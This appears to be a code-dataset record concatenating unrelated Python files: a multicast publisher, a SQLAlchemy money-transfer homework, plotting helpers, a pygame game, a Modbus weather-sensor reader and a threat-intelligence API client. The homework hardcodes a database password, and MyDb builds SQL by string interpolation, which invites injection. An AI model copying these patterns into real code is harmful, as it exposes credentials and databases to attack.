SETUP_SCRIPTS_DIR + (\"/compute_presetup_CI.bash \" + ip.rstrip() +\n \"| tee -a ${ODL_SFC_LOG} 1>/dev/null 2>&1\")\n\n output = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n\n# This code is for debugging purposes\n# for line in iter(output.stdout.readline, ''):\n# print(line)\n# sys.stdout.flush()\n\n output.stdout.close()\n\n if not (output.poll()):\n output.wait()\n\n # Get return value\n if output.returncode:\n print(\"The compute config did not work on compute %s\" % ip)\n sys.exit(output.returncode)\n\nsys.exit(0)\n","sub_path":"sfc/tests/functest/setup_scripts/prepare_odl_sfc.py","file_name":"prepare_odl_sfc.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"501511635","text":"import logging\nfrom datetime import datetime, timedelta\nfrom socketserver import BaseRequestHandler\n\nfrom mdcs.tcp.avro import unserialize_value\n\nfrom .schema import EVENT_SCHEMA\nfrom .server import MulticastServer\n\n\nclass PublishRequestHandler(BaseRequestHandler):\n def setup(self):\n self.logger = logging.getLogger(__name__)\n\n self.registry = self.server.registry\n self.packet, self.socket = self.request\n\n def handle(self):\n try:\n # parse the event message\n message = unserialize_value(EVENT_SCHEMA, self.packet)\n\n # check if it's a command\n if 'command' not in message:\n return\n\n # process the command\n if message['command'] == 'DISCOVER':\n for node in self.registry.nodes.values():\n self.server.send_message({\n 'node': node.name,\n 'config': {\n 'host': node.host,\n 'http_port': node.http_port,\n 'tcp_port': node.tcp_port\n },\n 'event': 'ONLINE'\n })\n\n for device in self.registry.devices.values():\n self.server.send_message({\n 'node': device.node,\n 'device': device.name,\n 'event': 'ONLINE'\n })\n\n # XXX: catch specific exceptions?\n except Exception as e:\n self.logger.error('multicast publish handler', exc_info=e)\n\n\nclass MulticastPublishServer(MulticastServer):\n \"\"\"\n A multicast network server that publishes the 
contents of a Registry.\n \"\"\"\n\n def __init__(self, config, registry):\n super().__init__(config, PublishRequestHandler)\n self.registry = registry\n self._publish_timeout = datetime.now()\n\n def service_actions(self):\n # periodically send out ONLINE states for nodes and devices\n publish_time = datetime.now()\n if publish_time > self._publish_timeout:\n for node in self.registry.nodes.values():\n self.send_message({\n 'node': node.name,\n 'config': {\n 'host': node.host,\n 'http_port': node.http_port,\n 'tcp_port': node.tcp_port\n },\n 'event': 'ONLINE'\n })\n\n for device in self.registry.devices.values():\n self.send_message({\n 'node': device.node,\n 'device': device.name,\n 'event': 'ONLINE'\n })\n\n # XXX this should be a configuration setting\n self._publish_timeout = publish_time + timedelta(seconds=30)\n\n def shutdown(self):\n # send out OFFLINE messages for nodes\n for node in self.registry.nodes.values():\n self.send_message({\n 'node': node.name,\n 'config': {\n 'host': node.host,\n 'http_port': node.http_port,\n 'tcp_port': node.tcp_port\n },\n 'event': 'OFFLINE'\n })\n\n # stop the server\n super().shutdown()\n","sub_path":"pkg/libmdcs-python/mdcs/discovery/multicast/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"56045281","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport logging\nimport pymysql\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import Column, Integer, String, DateTime, and_\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nmysql_host = \"192.168.136.128\"\nmysql_port = 3306\nmysql_user = \"testuser\"\nmysql_password = \"fT866jN^\"\nmysql_db = \"testdb\"\ndb_url = f\"mysql+pymysql://{mysql_user}:{mysql_password}@{mysql_host}/{mysql_db}?charset=utf8mb4\"\nuser_table = \"user\"\nasset_table = \"asset\"\naudit_table = \"audit\"\n\nBase = declarative_base()\n\n\nclass UserTable(Base):\n __tablename__ = user_table\n user_id = Column(Integer(), primary_key=True, nullable=False)\n user_name = Column(String(50), nullable=False, unique=True)\n create_time = Column(DateTime(), default=datetime.now)\n\n\nclass AssetTable(Base):\n __tablename__ = asset_table\n user_id = Column(Integer(), primary_key=True, nullable=False)\n total_asset = Column(Integer, nullable=False)\n update_time = Column(DateTime(), default=datetime.now, onupdate=datetime.now)\n\n\nclass AuditTable(Base):\n __tablename__ = audit_table\n trade_id = Column(Integer(), autoincrement=True, primary_key=True, nullable=False)\n trade_time = Column(DateTime(), nullable=False)\n from_user_id = Column(Integer(), nullable=False)\n to_user_id = Column(Integer(), nullable=False)\n trade_asset = Column(Integer, nullable=False)\n\n\ndef init_trade_info(orm_session_maker):\n\n user_1 = UserTable(\n user_id=1,\n user_name=\"张三\"\n )\n user_2 = UserTable(\n user_id=2,\n user_name=\"李四\"\n )\n\n user_1_asset = AssetTable(\n user_id=1,\n total_asset=50\n )\n\n user_2_asset = AssetTable(\n user_id=2,\n total_asset=20\n )\n\n sqlalchemy_session = orm_session_maker()\n try:\n sqlalchemy_session.add(user_1)\n sqlalchemy_session.add(user_2)\n sqlalchemy_session.add(user_1_asset)\n sqlalchemy_session.add(user_2_asset)\n sqlalchemy_session.commit()\n except Exception as e:\n logger.error(e)\n finally:\n 
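# --- Hedged sketch: the periodic-republish pattern used by
# --- MulticastPublishServer.service_actions above. Work runs only once a
# --- stored deadline passes; the 30-second interval mirrors the hard-coded
# --- value in that class, and print() stands in for send_message().
from datetime import datetime, timedelta

_deadline = datetime.now()

def service_actions_sketch():
    global _deadline
    now = datetime.now()
    if now > _deadline:
        print('republishing ONLINE states')  # stand-in for send_message(...)
        _deadline = now + timedelta(seconds=30)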
sqlalchemy_session.close()\n\n\ndef transfer_account(orm_session_maker):\n sqlalchemy_session = orm_session_maker(autocommit=False)\n from_user_name = \"张三\"\n to_user_name = \"李四\"\n trade_value = 100\n try:\n\n from_user_id = sqlalchemy_session.query(UserTable.user_id).filter(\n UserTable.user_name == from_user_name,\n ).one()[0]\n\n to_user_id = sqlalchemy_session.query(UserTable.user_id).filter(\n UserTable.user_name == to_user_name,\n ).one()[0]\n\n from_user_asset_entity = sqlalchemy_session.query(AssetTable).filter(\n AssetTable.user_id == from_user_id,\n ).one()\n\n to_user_asset_entity = sqlalchemy_session.query(AssetTable).filter(\n AssetTable.user_id == to_user_id,\n ).one()\n\n if from_user_asset_entity.total_asset >= trade_value:\n from_user_asset_entity.total_asset -= trade_value\n to_user_asset_entity.total_asset += trade_value\n audit_record = AuditTable(\n trade_time=datetime.now(),\n from_user_id=from_user_id,\n to_user_id=to_user_id,\n trade_asset=trade_value\n )\n sqlalchemy_session.add(audit_record)\n else:\n err_msg = f\"{from_user_name} 账户余额不足, 转账失败\"\n logger.error(err_msg)\n raise Exception(err_msg)\n\n sqlalchemy_session.commit()\n\n except Exception as e:\n logger.error(e)\n sqlalchemy_session.rollback()\n finally:\n sqlalchemy_session.close()\n\n\ndef main():\n sqlalchemy_engine = create_engine(db_url, echo=True, encoding=\"utf-8\")\n # 创建表\n Base.metadata.create_all(sqlalchemy_engine)\n orm_session_maker = sessionmaker(bind=sqlalchemy_engine)\n # 插入基础数据\n init_trade_info(orm_session_maker)\n # 交易\n transfer_account(orm_session_maker)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"week03/homework_6.py","file_name":"homework_6.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"96261610","text":"import matplotlib.pyplot as plt\r\n\r\n\r\ndef end_results_part(points_x, points_y, fig_num, is_donor):\r\n plt.figure(fig_num)\r\n plt.subplot(111)\r\n if is_donor is 0:\r\n plt.suptitle(\"Error rates for different intron lengths (acceptor)\")\r\n else:\r\n plt.suptitle(\"Error rates for different intron lengths (donor)\")\r\n\r\n plt.xlabel(\"Intron length [nucleotides]\")\r\n plt.ylabel(\"Error rate [%]\")\r\n plt.plot(points_x, points_y)\r\n\r\n if is_donor is 0:\r\n plt.savefig(\"img/acceptor_errors\")\r\n else:\r\n plt.savefig(\"img/donor_errors\")\r\n\r\n plt.close()\r\n\r\n\r\ndef sample_errors_part(error_y, fig_num, is_donor, len_plus):\r\n plt.figure(fig_num)\r\n plt.subplot(111)\r\n if is_donor is 0:\r\n plt.suptitle(\"Example: error rates for one intron length (\"+str(len_plus)+\") (acceptor)\")\r\n else:\r\n plt.suptitle(\"Example: error rates for one intron length (\" + str(len_plus) + \") (donor)\")\r\n plt.xlabel(\"Intron length [nucleotides]\")\r\n plt.ylabel(\"Error rate [%]\")\r\n plt.plot(error_y)\r\n # plt.subplot(212)\r\n # plt.plot(t, 2*s1)\r\n\r\n if is_donor is 0:\r\n plt.savefig(\"img/acceptor_errors_sample\" + str(len_plus))\r\n else:\r\n plt.savefig(\"img/donor_errors_sample\" + str(len_plus))\r\n\r\n plt.close()\r\n\r\n\r\ndef end_results(donor_points_x, donor_points_y, acceptor_points_x, acceptor_points_y):\r\n end_results_part(donor_points_x, donor_points_y, 1, 1)\r\n end_results_part(acceptor_points_x, acceptor_points_y, 2, 0)\r\n\r\n\r\ndef sample_errors(donor_points_y, acceptor_points_y, len_plus):\r\n sample_errors_part(donor_points_y, 3, 1, len_plus+2)\r\n sample_errors_part(acceptor_points_y, 4, 0, len_plus*2+25)\r\n\r\n\r\ndef 
main(donor_points_x, donor_points_y, acceptor_points_x, acceptor_points_y):\r\n end_results(donor_points_x, donor_points_y, acceptor_points_x, acceptor_points_y)\r\n sample_errors(donor_points_x, donor_points_y, 10)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"GraphPlotter.py","file_name":"GraphPlotter.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"277381515","text":"import pygame\n#from pygame_function import *\n# By Lisa and Jenny - all the images used are drawn by Lisa\n\npygame.init()\n\nscreen = pygame.display.set_mode((1440, 790))\n\nleft = False\nright = False\nup = False\ndown = False\nrunning = True\n\nclock = pygame.time.Clock()\n\n# background\nbackground = pygame.image.load(\"room.png\")\n\n#test\n#testSprite = makeSprite(\"q.gif\")\n\n# title icon\npygame.display.set_caption(\"The Adventure of A Magic Cat\")\n\n# Player\nPlayerI = pygame.image.load(\"o.png\")\n\npx = 200\npy = 300\npxc = 0\npyc = 0\np1 = 0\np2 = 0\ncount = {\"a\": '0', \"b\": '0', \"c\": '0', \"d\": '0'}\n\n# notif = pygame.image.load(\"n.png\")\nbox1 = pygame.image.load(\"box.png\")\nbox2 = pygame.image.load(\"box.png\")\nbox3 = pygame.image.load(\"box.png\")\nbox4 = pygame.image.load(\"box.png\")\nnt = False\nnt1 = True\nma = True\nma1 = False\nma2 = False\nt1 = False\nt2 = False\nt21 = True\nt22 = False\nt3 = False\nt4 = False\nfn = False\nbg = False\n\n\nwalk = [pygame.image.load(\"o.png\"), pygame.image.load(\"o.png\"), pygame.image.load(\"o.png\"), pygame.image.load(\"o2.png\"), pygame.image.load(\"o2.png\"), pygame.image.load(\"o2.png\"), pygame.image.load(\"o1.png\"), pygame.image.load(\"o1.png\"), pygame.image.load(\"o1.png\")]\nwalkr = [pygame.transform.flip(pygame.image.load(\"o.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o1.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o1.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o1.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o2.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o2.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o2.png\"), True, False)]\n\n\ndef f1(d, v):\n list = []\n\n for key in d:\n if str(d.get(key)) == v:\n return True\n if not list:\n return False\n return True\n\n\ndef player(x, y):\n screen.blit(PlayerI, (x, y))\n\n\ndef map1():\n global px\n global py\n global p1\n global p2\n\n global nt\n global nt1\n global background\n global st\n if st:\n px = -500\n py = -500\n redraw()\n pygame.time.delay(3000)\n px = 400\n py = 600\n st = False\n if px > 1300:\n px = p1\n py = p2\n if py < 130:\n px = p1\n py = p2\n if py > 670:\n px = p1\n py = p2\n if abs((400 - px)) < 100 and abs((350 - py)) < 100:\n nt = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n nt1 = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n nt1 = False\n if px <= 200:\n if 200 < py < 400 and px < 100:\n background = pygame.image.load(\"l.png\")\n px = -500\n py = -500\n redraw()\n pygame.time.delay(3000)\n background = pygame.image.load(\"map.png\")\n px = 300\n py = 50\n pygame.display.update()\n global ma\n ma = False\n global ma1\n ma1 = True\n elif py <= 200 or py >= 400:\n px = p1\n py = p2\n print (px, py)\n\n\ndef map2():\n global px\n global py\n global p1\n global p2\n global 
background\n\n global t1\n global t2\n global t3\n global t4\n global t22\n global t21\n if 50 < px < 250 and py < 410:\n px = p1\n py = p2\n if 350 < px < 550 and py < 170:\n px = p1\n py = p2\n if 350 < px < 550 and py > 250:\n px = p1\n py = p2\n if 550 < px < 750 and 50 < py < 170:\n px = p1\n py = p2\n if 700 < px < 860 and 50 < py < 530:\n px = p1\n py = p2\n if 1000 < px < 1160 and 50 < py:\n px = p1\n py = p2\n if py > 670 or py < -10 or px < 0 or px > 1310:\n px = p1\n py = p2\n if px < 20 and py < 50:\n px = 20\n py = 55\n global t12\n t1 = True\n t12 = True\n t21 = True\n pygame.display.update()\n if 350 > px > 300 and py > 575:\n px = 335\n py = 570\n\n t2 = True\n t22 = True\n t21 = True\n pygame.display.update()\n if 650 > px > 600 and py < 40:\n px = 680\n py = 40\n global t32\n t3 = True\n t32 = True\n t21 = True\n pygame.display.update()\n if px > 1250 and py > 590:\n px = 1230\n py = 560\n global t42\n t4 = True\n t42 = True\n t21 = True\n pygame.display.update()\n if not f1(count, '0'):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n global ma1\n # global fn\n global ma2\n background = pygame.image.load(\"food.png\")\n t1 = False\n t2 = False\n t3 = False\n t4 = False\n fn = True\n ma2 = True\n ma1 = False\n\n# print(px, py)\n\n\ndef map3():\n global background\n global px\n global py\n global bg\n global running\n px = -500\n py = -500\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n background = pygame.image.load(\"food1.png\")\n redraw()\n pygame.time.delay(3000)\n background = pygame.image.load(\"cake.png\")\n redraw()\n pygame.time.delay(3000)\n background = pygame.image.load(\"cake1.png\")\n redraw()\n pygame.time.delay(3000)\n background = pygame.image.load(\"end.png\")\n redraw()\n pygame.time.delay(3000)\n running = False\n\n# Loop\nwalkCount = 0\n\nst = True\n\ndef redraw():\n # screen background color rgb\n # background image\n\n global nt\n global walkCount\n global p1\n global p2\n global count\n global background\n global st\n global px\n global py\n screen.blit(background, (0, 0))\n\n if st:\n\n screen.blit(pygame.image.load(\"start.png\"), (0, 0))\n p1 = px\n p2 = py\n if walkCount + 1 >= 27:\n walkCount = 0\n if left:\n screen.blit(walk[walkCount//3], (px, py))\n walkCount +=1\n elif right:\n screen.blit(walkr[walkCount // 3], (px, py))\n walkCount += 1\n elif up:\n screen.blit(walk[walkCount // 3], (px, py))\n walkCount += 1\n elif down:\n screen.blit(walk[walkCount // 3], (px, py))\n walkCount += 1\n else:\n player(px, py)\n if nt and nt1:\n screen.blit(pygame.image.load(\"book.png\"), (450, 300))\n\n if t1:\n screen.blit(box1, (17, 13))\n if t12 and t21:\n screen.blit(pygame.image.load(\"egg.png\"), (450, 300))\n count[\"a\"] = '1'\n\n if t2:\n screen.blit(box2, (390, 700))\n if t22 and t21:\n screen.blit(pygame.image.load(\"choc.png\"), (450, 300))\n count[\"b\"] = '1'\n\n if t3:\n screen.blit(box3, (603, 60))\n if t32 and t21:\n screen.blit(pygame.image.load(\"flour.png\"), (450, 300))\n count[\"c\"] = '1'\n\n if t4:\n screen.blit(box4, (1340, 710))\n if t42 and t21:\n screen.blit(pygame.image.load(\"milk.png\"), (450, 300))\n count[\"d\"] = '1'\n #if fn:\n #screen.blit(pygame.image.load(\"milk.png\"), (450, 300))\n if bg:\n screen.blit(pygame.image.load(\"end.png\"), (450, 300))\n pygame.display.update()\n\n\nwhile running:\n clock.tick(27)\n # call to player and other objects\n px = px + pxc\n py = py + pyc\n\n # update screen\n pygame.display.update()\n\n # main character action\n for event in pygame.event.get():\n if 
event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n pxc -= 5\n left = True\n right = False\n up = False\n down = False\n elif event.key == pygame.K_RIGHT:\n pxc += 5\n left = False\n right = True\n up = False\n down = False\n elif event.key == pygame.K_UP:\n pyc -= 5\n left = False\n right = False\n up = True\n down = False\n elif event.key == pygame.K_DOWN:\n pyc += 5\n left = False\n right = False\n up = False\n down = True\n else:\n left = False\n right = False\n up = False\n down = False\n walkCount = 0\n if event.type == pygame.KEYUP:\n pxc = 0\n pyc = 0\n left = False\n right = False\n up = False\n down = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n t21 = False\n t12 = False\n t22 = False\n t32 = False\n t42 = False\n fn = False\n nt = False\n nt1 = False\n if ma:\n map1()\n if ma1:\n map2()\n if ma2:\n map3()\n redraw()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"16235979","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# @Time : 2021/2/6 12:11\n# @Author : LGH\n# @File : MyDb.py\n# @Software: PyCharm\n\nfrom collections import defaultdict\nimport pymysql\nimport yaml\n\n\nclass MyDb:\n\n def __init__(self):\n with open(\"./conf.yaml\", \"r\") as f:\n cfg = yaml.safe_load(f)\n \n self.name = cfg[\"MyDb\"][\"name\"]\n self.passwd = cfg[\"MyDb\"][\"passwd\"]\n self.dbname = cfg[\"MyDb\"][\"dbname\"]\n self.port = cfg[\"MyDb\"][\"port\"]\n self.host = cfg[\"MyDb\"][\"host\"]\n self.db = None\n\n def connect_db(self):\n self.db = pymysql.connect(host=self.host, user=self.name, password=self.passwd, database=self.dbname)\n return self.db\n\n def get_info(self, name):\n while True:\n try:\n # print(name)\n cursor = self.db.cursor()\n select_command = u\"select hostIp from cdnChannel where channelMark='%s';\" % name\n cursor.execute(select_command)\n results = cursor.fetchall()\n # print(type(results))\n name_list = []\n # print('results: {}'.format(results))\n if len(results) != 0:\n name_list.append(name)\n server_dict1 = defaultdict(list)\n for n in results:\n server_dict1[n[0]].append(name)\n else:\n select_command1 = 'select hostIp,channelMark from cdnChannel where channelMark like \"%' + name + '@%\";'\n # print(select_command1)\n cursor.execute(select_command1)\n results = cursor.fetchall()\n print('results: {}'.format(results))\n server_dict1 = defaultdict(list)\n for n in results:\n if n[1] not in name_list:\n name_list.append(n[1])\n server_dict1[n[0]].append(n[1])\n # print('get-server_dict: {}'.format(server_dict1))\n # print('name_list: {}'.format(name_list))\n # 返回ip列表\n break\n except pymysql.OperationalError as e:\n print(e)\n self.db.ping()\n self.connect_db()\n # print('name_list: {}'.format(name_list))\n # print('server_dict: {}'.format(server_dict1))\n return name_list, server_dict1\n\n def close(self, connect_db):\n connect_db.close()","sub_path":"change_name/MyDb.py","file_name":"MyDb.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93862818","text":"import datetime\ndef printTimeStamp(name):\n print('Автор програми: ' + name)\n print('Час компіляції: ' + str(datetime.datetime.now()))\nprintTimeStamp('Лапін Костянтин')\n\n\ndef Exponentiation(x,n):\n if n == 0:\n return 1\n elif n > 0:\n if n%2 == 0:\n return 
Exponentiation(x, n//2)**2\n        else:\n            return x * Exponentiation(x,n-1)\n\n\n    elif n < 0:\n\n        return 1/(x**-n)\n\n\nprint(Exponentiation(2,4))","sub_path":"day 3/A/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"279597252","text":"'''\nDyacon TPH-1 Sensor\n- Platform: Windows\n- Connection: USB-RS485\n- Interface: DataBear Sensor Interface V0\n\n'''\n\nimport datetime\nimport minimalmodbus as mm\n\nclass dyaconTPH:\n    #Inherit from \"modbus sensor class\"?\n    def __init__(self,name,settings):\n        '''\n        Create a new Dyacon TPH sensor\n        Inputs\n        - Name for sensor\n        - settings['serialnumber'] = Serial Number\n        - settings['port'] = Serial com port\n        - settings['address'] = Sensor modbus address\n        '''\n        self.name = name\n        self.sn = settings['serialnumber']\n        self.port = settings['port']\n        self.address = settings['address']\n        self.frequency = settings['measurement']\n\n        #Serial settings\n        self.rs = 'RS485'\n        self.duplex = 'half'\n        self.resistors = 1\n        self.bias = 1\n\n        #Define characteristics of this sensor\n        self.sensor_type = 'polled'\n        self.maxfrequency = 1 #Maximum frequency in seconds the sensor can be polled\n\n        #Define measurements\n        airT = {'name':'airT','register':210,'regtype':'float'}\n        rh = {'name':'rh','register':212,'regtype':'float'}\n        bp = {'name':'bp','register':214,'regtype':'float'}\n        self.measurements = [airT,rh,bp]\n\n        #Setup measurement\n        self.comm = mm.Instrument(self.port,self.address)\n        self.comm.serial.timeout = 0.3\n\n        #Initialize data structure\n        self.data = {'airT':[],'rh':[],'bp':[]} #Empty data dictionary\n\n    def measure(self):\n        '''\n        Read in data using modbus\n        '''\n        for measure in self.measurements:\n            dt = datetime.datetime.now()\n            val = self.comm.read_float(measure['register'])\n\n            #Output results for testing\n            timestamp = dt.strftime('%Y-%m-%d %H:%M:%S %f')\n            print('Measure {}: {}, value= {}'.format(measure['name'],timestamp,val))\n\n            self.data[measure['name']].append((dt,val))\n\n\n    def cleardata(self,name):\n        '''\n        Clear data values for a particular measurement\n        '''\n        self.data[name] = []\n","sub_path":"databear/sensors/dyaconTPH1.py","file_name":"dyaconTPH1.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"460238905","text":"import warnings\n\nimport requests\nfrom requests.exceptions import ReadTimeout\nimport copy\nimport logging\n\nfrom .apiclient import BaseApiClient, DEFAULT_AUTH, DEFAULT_TIMEOUT, \\\n    DEFAULT_RETRIES\nfrom . 
import RAW_API_URL\nfrom .dotindex import dot_index\nfrom .datamodel import Entity, \\\n Reference, \\\n Event, \\\n DotAccessDict\nfrom .query import BaseQuery, \\\n ReferenceQuery, \\\n EntityQuery, \\\n EventQuery, \\\n get_query_type\n\nfrom .query import JSONQueryResponse, \\\n CSVQueryResponse\n\n# pylint: disable=unused-import\nfrom .error import RemoteServerError, InvalidRFQError\n\nLOG = logging.getLogger(__name__)\n\n\nclass RawApiClient(BaseApiClient):\n \"\"\"Provides simplified access to the Recorded Future API.\n\n The api object will handle authentication and encapsulation of\n a query.\n\n Ex:\n >>> api = RawApiClient()\n >>> query = EntityQuery(type=\"Company\", name=\"Recorded Future\")\n >>> result = api.query(query)\n >>> type(result)\n \n >>> int(result.total_count)\n 1\n \"\"\"\n\n def __init__(self,\n auth=DEFAULT_AUTH,\n url=RAW_API_URL,\n proxies=None,\n timeout=DEFAULT_TIMEOUT,\n app_name=None,\n app_version=None,\n pkg_name=None,\n pkg_version=None,\n accept_gzip=True,\n platform=None):\n \"\"\"Initialize API.\n\n Args:\n auth: If a token (string) is provided it will be used,\n otherwise the environment variables RF_TOKEN (or legacy\n RECFUT_TOKEN) are expected.\n Also accepts a requests.auth.AuthBase object\n url: Recorded Future API url\n proxies: Same format as used by requests.\n timeout: connection and read timeout used by the requests lib.\n app_name: an app name which is added to the user-agent http\n header (ex \"ExampleApp\").\n app_version: an app version which is added to the user-agent http\n header (ex \"1.0\"). Use of this requires app_name above.\n pkg_name and pkg_version: same as above for package.\n accept_gzip: whether or not we access gzip compressed data or not\n platform: id of the platform running the script (ex Splunk_1.2.3)\n\n See http://docs.python-requests.org/en/master/user/advanced/#proxies\n for more information about proxies.\n \"\"\"\n BaseApiClient.__init__(self, auth, url,\n proxies, timeout,\n app_name, app_version,\n pkg_name, pkg_version,\n accept_gzip,\n platform)\n\n # pylint: disable=too-many-branches\n def query(self, query, params=None, tries_left=DEFAULT_RETRIES):\n \"\"\"Perform a standard query.\n\n Args:\n query: a dict containing the query.\n params: a dict with additional parameters for the API request.\n tries_left: number of retries for read timeouts\n\n Returns:\n QueryResponse object\n \"\"\"\n\n # defer checking auth until we actually query.\n self._check_auth()\n\n query = copy.deepcopy(query)\n\n params = self._prepare_params(params)\n headers = self._prepare_headers()\n response = None\n\n query_type = get_query_type(query)\n is_scan = (query_type in query and\n query[query_type].get(\"searchtype\") == \"scan\")\n try:\n LOG.debug(\"Requesting query json=%s\", query)\n response = self._request_session.post(self._url,\n json=query,\n params=params,\n headers=headers,\n auth=self._auth,\n proxies=self._proxies,\n timeout=self._timeout)\n response.raise_for_status()\n\n except requests.HTTPError as req_http_err:\n if response.status_code == 502 or response.status_code == 503:\n # gateway error or service unavailable, ok to retry\n if tries_left > 0:\n tries_left -= 1\n msg = \"Got error with status=%s. \" \\\n \"Retrying with tries=%s left\"\n LOG.warning(msg, response.status_code, tries_left)\n return self.query(query,\n params=params,\n tries_left=tries_left)\n\n msg = \"An exception occurred during the query: %s. 
\" \\\n \"Error was: %s\"\n LOG.exception(msg, query, response.content)\n self._raise_http_error(response, req_http_err)\n\n except ReadTimeout:\n\n if is_scan and \"page_start\" in query[query_type]:\n # we will get illegal page start if we retry\n raise\n\n if tries_left > 0:\n LOG.exception(\"Read timeout during query. \"\n \"Retrying. Attempts left: %s\", tries_left)\n tries_left -= 1\n return self.query(query,\n params=params,\n tries_left=tries_left)\n else:\n raise\n\n except requests.RequestException:\n LOG.exception(\"Exception occurred during query: %s.\", query)\n raise\n\n expect_json = not (\"output\" in query and\n query['output'].get(\"format\", \"json\") != \"json\")\n return self._make_response(expect_json, response)\n\n def _validate_json_response(self, resp):\n if resp.get('status', '') == 'FAILURE':\n msg = \"Server failure:\\n\" \\\n \"HTTP Status: {code}\\t\" \\\n \"Message: {error}\"\n code = resp.get('code', None)\n error = resp.get('error', 'NONE')\n msg = msg.format(code=code, error=error)\n raise RemoteServerError(msg)\n\n # pylint: disable=too-many-arguments,too-many-locals,too-many-branches\n def paged_query(self,\n query,\n limit=None,\n batch_size=1000,\n field=None,\n unique=False,\n raw=False):\n \"\"\"Generator for paged query results.\n\n Args:\n query: a dict containing the query.\n limit: optional int, return a max of limit result units\n field: optional string with dot-notation for getting specific\n fields.\n batch_size: optional int\n unique: optional bool for filtering to unique values.\n raw: return raw QueryResponse object\n\n \"\"\"\n query = copy.deepcopy(query)\n query_type = get_query_type(query)\n if not query_type:\n msg = 'Unknown query type {}. Unable to page query.'\n raise InvalidRFQError(msg.format(query_type), query)\n\n # Check for aggregate queries\n output = query.get('output')\n if isinstance(output, dict) and 'count' in output:\n msg = 'Aggregate query cannot be used in paging'\n raise InvalidRFQError(msg, query)\n\n if 'limit' in query[query_type]:\n msg = \"Ignoring limit in query, use limit \" \\\n \"and batch_size arguments in paged queries.\"\n warnings.warn(msg, SyntaxWarning)\n\n if limit is None:\n query[query_type]['limit'] = batch_size\n else:\n query[query_type]['limit'] = min(batch_size, limit)\n\n seen = set()\n n_results = 0\n # pylint: disable=too-many-nested-blocks\n while True:\n query_response = self.query(query)\n\n if raw:\n n_results += query_response.returned_count\n yield query_response\n\n elif isinstance(query_response, JSONQueryResponse):\n if field is None:\n n_results += query_response.returned_count\n yield query_response.result\n else:\n tmp = dot_index(field, query_response.result)\n for item in tmp:\n if unique:\n if item in seen:\n continue\n seen.add(item)\n n_results += 1\n yield item\n if limit is not None and n_results >= limit:\n # ok, we are done\n return\n elif isinstance(query_response, CSVQueryResponse):\n csv_reader = query_response.csv_reader()\n if n_results == 0:\n yield csv_reader.fieldnames\n\n for row in csv_reader:\n n_results += 1\n yield row\n if limit is not None and n_results >= limit:\n # ok we are done\n return\n else:\n # XML, just return plain response\n n_results += query_response.returned_count\n yield query_response\n\n LOG.debug(\"Received %s/%s items\", n_results,\n query_response.total_count)\n if query_response.total_count <= n_results:\n return\n\n if not query_response.has_more_results:\n return\n\n if limit is not None and n_results >= limit:\n return\n\n 
query[query_type][\"page_start\"] = query_response.next_page_start\n\n def get_references(self, query, limit=20):\n \"\"\"Fetch references (aka instances).\n\n Args:\n query: the 'instance' part of an RF API query.\n limit: limit number of references in response.\n Set to None for no limit\n\n Returns:\n An iterator of References.\n\n Ex:\n >>> api = RawApiClient()\n >>> type(next(api.get_references({\"type\": \"CyberAttack\"}, limit=20)))\n \n \"\"\"\n ref_query = ReferenceQuery(query)\n refs = self.paged_query(ref_query, limit=limit, field=\"instances\")\n for ref in refs:\n yield Reference(ref)\n\n def get_events(self, query, limit=20):\n \"\"\"Fetch events.\n\n Args:\n query: the 'cluster' part of an RF API query.\n limit: limit number of events in response. Set to None for no limit\n\n Returns:\n An iterator of Events.\n\n Ex:\n >>> api = RawApiClient()\n >>> type(next(api.get_events({\"type\": \"CyberAttack\"}, limit=20)))\n \n \"\"\"\n event_query = EventQuery(query)\n events = self.paged_query(event_query, limit=limit, field=\"events\")\n for event in events:\n yield Event(event)\n\n def get_entity(self, entity_id):\n \"\"\"Get an entity.\n\n Args:\n entity_id: the unique id of the entity\n\n Returns:\n An entity\n\n Ex:\n >>> api = RawApiClient()\n >>> str(api.get_entity('ME4QX').name)\n 'Recorded Future'\n \"\"\"\n resp = 